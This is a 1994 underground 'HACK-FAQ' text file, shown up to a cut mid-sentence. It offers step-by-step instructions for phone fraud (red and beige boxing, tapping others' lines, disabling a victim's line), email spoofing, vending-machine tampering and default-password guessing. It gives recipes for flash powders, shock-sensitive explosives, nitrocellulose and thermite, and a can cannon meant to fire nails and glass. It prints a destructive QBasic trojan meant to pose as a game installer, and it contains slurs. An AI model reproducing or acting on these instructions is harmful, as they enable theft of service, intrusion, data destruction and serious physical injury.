Jun 13, 1994 19:54 from Belisarius _____________ / / / *** *** ****** ****** / *** *** ********* ********* / / *** *** *** *** *** *** / / *********** *********** *** *** / /_____ ______ *********** *********** *** ** *** / / / /_____/ *** *** *** *** *** ***** / / / / *** *** *** *** *********** / / / /______ *** *** *** *** ***** *** +---------------+ | THE HAQ | | Edition 2.07 | | 11 JUN 1994 | +---------------+ "Knowledge is power" --Francis Bacon "United we stand, divided we fall" --Aesop =+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+= = = + MatrixMage Publications. 1994 No rights reserved. + = = + This file may be redistributed provided that the file and this + = notice remain intact. This article may not under any = + circumstances be resold or redistributed for compensation of any + = kind. Distribution of THE HACK-FAQ! is encouraged and promoted. = + + =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= <*> Edited by <*> # Editor-in-Chief # Belisarius < temporary loss of E-mail > can be reached on ISCA, Shadow, SkyNET, Brinta and Baltimore 2600 Meetings and other nameless locations. # Asst. Editor (non communicado) # Neurophire (on Shadow and N P on ISCA) A MatrixMage Electronic Publication Special Thanks to the Following Contributors: Z Maestro RA of ISCA Underground> DINO RA of Shadow Hack and Crack> Artimage RA of SKYNET Underground> Faunus Revolution Miska Informatik Matrixx Amarand Crypto Steelyhart aBBa / PfA Beelzebub Redbeard Squarewave IO CyberSorceror Caustic Doktor Nil Skipster Walrus CPT Ozone Abort Kyoti Carsenio Aero Phrack AND NOW A WORD FROM YOUR EDITOR: Throughout history mankind has been afraid of the unknown. Before lightning could be scientifically explained it was blamed on the anger of the gods. This belief in mysticism persisted throughout the ages (and still does today). Later as man acquired simple herbal and chemical knowledge, these men were revered as mages, users of mystical arts derived from the old gods. But as organized religion (i.e. Christianity especially Roman Catholicism) spread and came to dominate society (became the powers that be), the mage was no longer revered. The mage (who only sought to understand the world around himself and make the world a better place) was persecuted, attacked and driven underground by the church. But driving these mages underground (out of society) did not stop there ideas from spreading or them from continuing to work. The church label Copernicus as a heretic and mage and only this century has the Roman Catholic church accepted his principles (heliocentric universe) as fact. So are 'hackers' the same today. We surf the nets seeking knowledge and information (and hopefully understanding). Information and understanding the meaning and import of the information are the two greatest commodities and bases of power in the world today. These things are easy to disseminate and gather in the electronic world. The matrix (cyberspace/web/net [whichever term you choose] is able to influence and control information faster and better than ever before. This makes many afraid of the cyberculture (not to mention a deep-seated techno-fear of many people, anything new and technical is bad). We are a new breed of mage; seeking knowledge, desiring understanding, persecuted by the powers that be. This is why I have started this publication. We are the MatrixMages! Our mission is to learn and to pass on that knowledge. -=> Belisarius <=- ********************************************************************* What is 'Cyberpunk' and the Underground? "Every time I release a phile, or write an article for a zine, it's vaguely like a baby. It gets stored, and copied, and sent out all over the world, and people read it. It goes into their minds. Something I created is buried in living tissue and consciousness someplace. Eventually somebody uses it, and I know that I have the power to change the world. Somewhere, someplace, somebody changed something using information I changed or created. I helped to change the world." --Unknown That is the attitude of many of the people who, knowingly or not, are members of this hyped/wired/cyber culture. Some who may read this will see some of their undefined beliefs, hopes and feelings reflected in the above quote. And, as the quote says, they will help spread it. Somewhere, somehow, that quote will change the world. But only if you work to change it. Remember that information and knowledge a powerful commodities. He who has information cannot be beaten. So above all the most important thing to do in the "Underground" is to gather information. This means that you have to work and put in some effort. You don't get something' for nothing! So work hard and together we can change the world! Keep up with latest editions. (Sorry there haven't been many lately but exams and not failing out took precedence!) The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor are not responsible for any consequences. You use this information at your own risk. ********************************************************************* CONTENTS ********************************************************************* Sections I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) II. Fake E-Mail (Fooling UUCP) III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding) IV. The Big Bang (Making Weapons and Explosives) V. Infection (Virii, Trojans, Worms and other creepy crawlies) VI. NEWBIES READ THIS (Basic Hacking) VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking) VIII. Screwing with the most secure operating system on the net (VAX/VMS Hacking) IX. Screwing with the most widespread operating system on PCs (MS-DOS Hacks) X. Finding out what that encrypted info is (Cracking programs) XI. How do I keep my info secure (PGP / Cryptology) XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. Tuning in to what's on the radio waves (Radios and Scanning) Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Zines E. Books F. Files and Papers G. Cataglogs H. PGP Keys ********************************************************************* ===================================================================== I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 MHz one you bought, but otherwise vaguely similar. It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 MHz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? (from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *'s Here are the freqs for a red box: $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freqs for 66 milliseconds! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO YOU KNOW THAT THE PHONE IS A COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real fortress phones but others look about the same except for a lack of phone company logo. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. Cut the head off one end of the phone cord. 2. Strip the coating back about two (2) inches. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a lamer, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the threaded end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ BEIGE BOXING 101 Field Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and fry a phreak" it doesn't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this file to whoever you want, just make sure it all stays together, same title, same byline. Field phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hi-tech revenge, anything you can do from your own phone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your phone cord before the jack, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. If you see yellow and black wires too just ignore them. Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a phone, laptop, anything you can plug in a jack.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on phone poles, where your phone line meets your house, and near payphones. I'll go into detail below, but basically just open any box on a telephone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a phone jack. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just fuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telephone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one phone line. These are the fist sized gray or black boxes that appear where a single phone line meets the mother line. They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their phone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. These are the 3 foot high green/gray metal columns that are no wider than a telephone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of phone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig-zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from friends and some social engineering, I learned that inside is where two underground phone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to phone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6 x 4, attached to a telephone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 phones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 phones the box connects too). On houses: follow the phone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payphones: follow the phone line up from the phone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little phone jack. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there will be a sw. ap. like those on houses (see above). Payphones are normally pretty secure now though, and you probably won't find any of those. Phreaky things you can do: Jesus, do I have to tell you lamers everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hi-tech revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to elite for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something a lot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telephone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two terminals with a paper clip or an alligator clip! His phone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (his #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, E-mail revolution@delphi.com no PGP needed. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I USE/DO ALLIANCE TELECONFERENCING? (from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to choose the number of ports for your conference call, and how to dial each participant.. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK? (from Token) Just scroll through your favorite business magazine and look for 800#s. Once you get a VMB system you can look for a box being used and try the default passcodes <0000> , <9999> , etc. Like on the INet, most people are too dumb to change their passwd. If you're lucky you might get the root box (I did, the stupid ass's passwd was <4321>). ===================================================================== II. Fake E-mail (Fooling UUCP) HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)? (from Beelzebub, Doktor Nil w/ Belisarius) 1. Telnet to port 25 of any internet server (eg. telnet site.name.and.address 25) 2. If at all possible, AVOID TYPING "HELO". 3. Type: rcpt to (person to receive fake mail){ENTER} 4. Type: mail from (fake name and address){ENTER} 5. The mail server should ok each time after each name. 6. If it does not: a) type vrfy and then the name of the person b) as a last resort use helo, this will login your computer as having been the source of the mail 7. Retype the commands, it should say ok now. 8. Type: data{ENTER} 9. The first line of the message will be the Subject line 10. Enter your letter 11. To send letter type a "." on an empty line. 12. Then type quit{ENTER} 13. This is traceable by any sysadmin ... don't harass people this way. 14. If the person receiving the mail uses a shell like elm he/she will not see the telltale fake message warning "Apparently-To:(name)" even if not, most people wouldn't know what it means anyway. 15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4 so as to make it look more believable and cover any add-ons the mail routine might try 16. Put a realistic mail header in the mail message to throw people off even more. If there are To: and Date: lines then the program probably won't add them on. 17. Also try to telnet to the site where the recipient has his account. This works better if you know how to fool it. ===================================================================== III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding) WHAT DOES SALTING VENDING MACHINES DO? When you take concentrated salt water (a high concentration of salt) and squirt it into the change slot (preferably where the dollar bills come in, though some say it doesn't matter), the salt will short circuit the machine and out will pour change and hopefully sodas. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ANOTHER WAY OF GETTING FREE SODAS? This is an easier and actually more reliable way of getting free sodas. It only wprks pn spme machines though, usually Coca-Cola. Anyways, put in your change and as the last coin goes down the slot start rapidly and repeatedly pressing the button of your choice. If everything works well, then you should get two sodas and your change back. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW ARE THE TRACKS OF ATM CARD ARRANGED? The physical layout of the cards are standard. The logical arrangement of the data stored on the magnetic strip varies from institution to institution. There are some generally followed layouts, but not mandatory. There are actually up to three tracks on a card. Track 1: Designed for airline use. Contains name and possibly your account number. This is the track that is used when the ATM greets you by name. There is alot of variation in how things are ordered so occasionally you get 'Greetings Q. John Smith' or 'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'. This track is also used with the new airline auto check in (PSA, American, etc). Track 2: The main operational track for online use. The first thing on the track is the Primary Account Number (PAN). This is usually pretty standard for all cards. Some additional info might be on the card such as expiration date. One interesting item is the PIN (Personal Identification Number) offset. When an ATM verifies a PIN locally, it usually uses an encryption scheme involving the PAN and a secret KEY. This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got generated). If you want to select your own PIN, they would put the PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on the Natural PIN plus the offset, and you have the selected PIN. The PIN is never in the clear on your card. Knowing the PIN OFFSET will not give you the PIN. This will require the SECRET KEY. Track 3: The "OFF-LINE" ATM track. It contains information such as your daily limit, limit left, last access, account number, and expiration date. The ATM itself could have the ability to write to this track to update information. ===================================================================== IV. The Big Bang (Making Weapons and Explosives) FLASH POWDERS: (from Neurophyre) Materials: Powdered magnesium, powdered potassium nitrate 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium nitrate. 2. Light it with a long fuse cuz its so bright it might screw up your eyes. REAL Cherry Bomb Powder 4 parts by weight of potassium perchlorate 1 part by weight of antimony trisulfide 1 part by weight aluminum powder Relatively Safe 3 parts by weight of potassium permanganate 2 parts by weight of aluminum powder *VERY* Shock/Friction/Static/Heat Sensitive! Use only if suicidal or desperate! 4 parts by weight of potassium chlorate 1 part by weight of sulfur 1 part by weight of aluminum powder 1) To use these mixtures, SEPARATELY pulverize each ingredient into a fine powder, the finer it is, the more power you get. Use a mortar and pestle if available, and grind GENTLY. Do not use plastic as this can build a static charge. Remember, do them SEPARATELY. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AMATEUR EXPLOSIVE (Ammonium Triiodide): (from IO) WARNING: This explosive is EXTREMELY shock sensitive when dry, and moderately sensitive when wet!!! AVOID IT when dry! DO NOT store! The purplish iodine vapor this produces during the explosion will stain and corrode! 1) Take a small plastic bucket, add 3-4 inches of household ammonia. This bucket will never be clean again, in all likelihood. Try to get clear (non-pine, non-cloudy) ammonia. Or use an ammonium hydroxide solution from a chemlab. This results in better but more sensitive, and therefore dangerous crystals. 2) Drop in iodine (like you use on scratches) one drop at a time, or, preferably, use crystals of iodine. 3) Let it settle, then pour it through a piece of cloth, discarding the runoff. 4) Squeeze *gently* to get out excess liquid. 5) Mold it onto the thing you want to blow up, stand **way** back. 6) Wait for it to dry, and throw a rock at it. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW TO BUILD A TENNIS BALL CANNON? 1. Get six (6) tin cans. 2. From five of them remove the tops and bottoms. 3. From the last one remove only the top. (this is the last can to make the breach) 4. The cans should overlap and be fit together to make a long barrel closed at one end and open at the other. ___________________________________ open --> ()____)_____)_____)_____)_____)_____) <--closed (barrel) 1 2 3 4 5 6 (breach) 5. Duct tape all of the cans together. USE LOTS OF TAPE!! 6. Put some gunpowder in the bottom of the CANnon. 7. Aim, brace the CANnon. 8. Spray hairspray or pour alcohol on the tennis ball and light. 9. Drop the ball into the can and STAND BACK! Other ideas: a) Make explosive tennis balls. b) Launch potatoes. c) Launch thumbtacks, nails, broken glass, etc. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)? (from Terrorist's Handbook) Materials: cotton, concentrated nitric acid, concentrated sulfuric acid, distilled water Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue litmus paper Procedure: 1. Pour 10mL of sulfuric acid into beaker. 2. Pour 10mL of nitric acid into beaker with sulfuric acid. 3. Immediately add 0.5 gram of cotton. 4. Allow it to soak for EXACTLY three(3) minutes. 5. Remove the nitrocellulose. 6. Put the nitrocellulose into a beaker of distilled water to wash it in. 7. Allow the material to dry. 8. Re-wash it. 9. Once neutral(acid/base) it can be dried and stored. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THERMITE AND HOW DO I MAKE IT? Thermite is a powder which burns incredibly hot (approx. 2200 deg C) and can be used to burn through most anything. Materials: powdered aluminum, powdered iron oxide Procedure: mix the two powders together as evenly as possible Ignition: thermite is difficult to ignite but these work a) mix a small amount of potassium chlorate into the thermite mixture and ignite with a few drops of sulfuric acid b) magnesium strip or 'sparkler' stuck into the powder which is then lit as a fuse ===================================================================== V. Infection (Virii, Trojans, Worms and other creepy crawlies) WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - :( ] Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. There are alot of places in the US to get virii too: The Hell Pit in Chicago has over 1500, and they don't accept the lame stuff like the ones written in basic, so they're all good ones. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SAMPLE OF A TROJAN (from Spear) This is a little trojan I wrote in Qbasic 4.5 It's a bitch! REM bitch by Spear color 14,0 print"installing datafiles... Please wait..." print"This may take up to 20 minutes, depending on your computer..." shell "cd\" for a = 1 to 100000 a$=str$(a) c$="md" + a$ + ".hee" shell c$ next a cls print"Cybermattixx Version 1.0 is now installed on your system..." print"Have a shitty day!" print " ?AM?" print input "Hit ENTER To REBOOT your System now!";a$ shell "boot.com" How to use it? This can pose as the installation program for a game. This means that when you upload it to a BBS or something, and post that it is a kickass game, people will download it and try to install it on their computers! What does it do? This program changes directory to the root and makes 100000 dirs in the root. You cannot use deltree to wipe them out in one chunk and you CANNOT get rid of them without doing reverse engineering on the program, ie. rd instead of md. To get rid of them any other way you would have to format c: or d: ** _____________ / / / *** *** ****** ****** / *** *** ********* ********* / / *** *** *** *** *** *** / / *********** *********** *** *** / /_____ ______ *********** *********** *** ** *** / / / /_____/ *** *** *** *** *** ***** / / / / *** *** *** *** *********** / / / /______ *** *** *** *** ***** *** +---------------+ | THE HAQ | | Edition 2.07 | | 11 JUN 1994 | +---------------+ File 2 of 3 ===================================================================== VI. NEWBIES READ THIS (Basic Hacking) WHAT MAKES A SYSTEM SECURE? (from alt.security FAQ) "The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete bunker, and is surrounded by nerve gas and very highly paid armed guards. Even then I wouldn't stake my life on it." - originally from Gene Spafford ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM? Password Access- Get rid of simple passwords; routinely change all passwords; regular review/monitoring of password files Physical Access- Lock up terminals, personal computers, disks when not in use; eliminate unnecessary access lines; disconnect modems when not in use Other measures- Know who you are talking to; shred all documents; avoid public domain software; report suspicious activity (especially non-working hours access) What this all means is that hackers must now rely on the ineptitude and laziness of the users of the system rather than the ignorance of SysOps. The SysOps and SecMans (Security Managers) are getting smarter and keeping up to date. Not only that, but they are monitoring the hack/phreak BBSes and publications. So the bottom line is reveal nothing to overinquisitive newbies...they may be working for the wrong side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS A FIREWALL? (from the comp.security.misc FAQ) A (Internet) firewall is a machine which is attached (usually) between your site and a Wide Area Network (WAN). It provides controllable filtering of network traffic, allowing restricted access to certain Internet port numbers and blocks access to pretty well everything else. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS? 1. Don't do damage intentionally. 2. Don't alter files other than than to hide your presence or to remove traces of your intrusion. 3. Don't leave any real name, handle, or phone number on any system. 4. Be careful who you share info with. 5. Don't leave your phone number with anyone you don't know. 6. Do NOT hack government computers. 7. Don't use codes unless you HAVE too. 8. Be paranoid! 9. Watch what you post on boards, be as general as possible. 10. Ask questions...but do it politely and don't expect to have everything handed to you. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO I DO IF I AM GETTING NOWHERE? 1. Change parity, data length, and stop bits. The system may not respond to 8N1 (most common setting) but may respond to 7E1,8E2, 7S2, etc. 2. Change baud rates. 3. Send a series of carriage returns. 4. Send a hard break followed by a carriage return. 5. Send control characters. Work from ^a to ^z. 6. Change terminal emulation. 7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO, LOGON, JOIN, HELP, or anything else you can think off. ===================================================================== VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking) WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX? (from Belisarius) Common default accounts are root, admin, sysadmin, unix, uucp, rje, guest, demo, daemon, sysbin. These accounts may be unpassworded or the password may possibly be the same (i.e. username uucp has uucp as the passwd). ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW IS THE UNIX PASSWORD FILE SETUP? (from Belisarius) The password file is usually called /etc/passwd Each line of the passwd file of a UNIX system follows the following format: userid:password:userid#:groupid#:GECOS field:home dir:shell What each of these fields mean/do--- userid -=> the userid name, entered at login and is what the login searches the file for. Can be a name or a number. password -=> the password is written here in encrypted form. The encryption is one way only. When a login occurs the password entered is run through the encryption algorithm (along with a salt) and then contrasted to the version in the passwd file that exists for the login name entered. If they match, then the login is allowed. If not, the password is declared invalid. userid# -=> a unique number assigned to each user, used for permissions groupid# -=> similar to userid#, but controls the group the user belongs to. To see the names of various groups check /etc/group GECOS FIELD -=> this field is where information about the user is stored. Usually in the format full name, office number, phone 